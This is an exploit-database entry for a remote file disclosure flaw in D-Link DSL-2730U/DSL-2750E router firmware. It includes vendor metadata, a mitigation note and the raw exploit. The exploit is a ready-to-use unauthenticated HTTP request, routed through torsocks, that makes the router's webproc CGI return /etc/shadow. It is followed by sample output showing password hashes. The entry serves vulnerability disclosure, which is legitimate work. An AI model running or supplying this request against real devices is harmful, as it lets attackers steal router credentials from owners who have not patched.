D-Link ADSL ROUTER DSL-2730U IN_1.02 Remote File Disclosure

vendor:

DSL-2730U/DSL-2750E

by:

Todor Donev

7,5

CVSS

HIGH

Remote File Disclosure

200

CWE

Product Name: DSL-2730U/DSL-2750E

Affected Version From: IN_1.02/SEA_1.04/SEA_1.07

Affected Version To: IN_1.02/SEA_1.04/SEA_1.07

Patch Exists: YES

Related CWE: N/A

CPE: h:d-link:dsl-2730u

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

D-Link ADSL ROUTER DSL-2730U IN_1.02 Remote File Disclosure

A vulnerability in D-Link ADSL ROUTER DSL-2730U IN_1.02 allows an unauthenticated attacker to remotely disclose sensitive files on the device. By sending a specially crafted HTTP request to the device, an attacker can access the /etc/shadow file, which contains the hashed passwords of all users on the device. This vulnerability affects D-Link DSL-2730U/DSL-2750E devices running firmware version IN_1.02/SEA_1.04/SEA_1.07.

Mitigation:

Users should update their devices to the latest firmware version available from the vendor.

Source

Exploit-DB raw data:

#!/bin/sh
# 
#  D-Link ADSL ROUTER DSL-2730U IN_1.02
#  Remote File Disclosure
#
#  Modem Name:               DSL-2730U/DSL-2750E
#  Time and Date:            2012-05-23 09:51:16
#  HardwareVersion:          U1
#  Firmware Version:         IN_1.02/SEA_1.04/SEA_1.07
# 
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova that support me.  

[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
#  #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::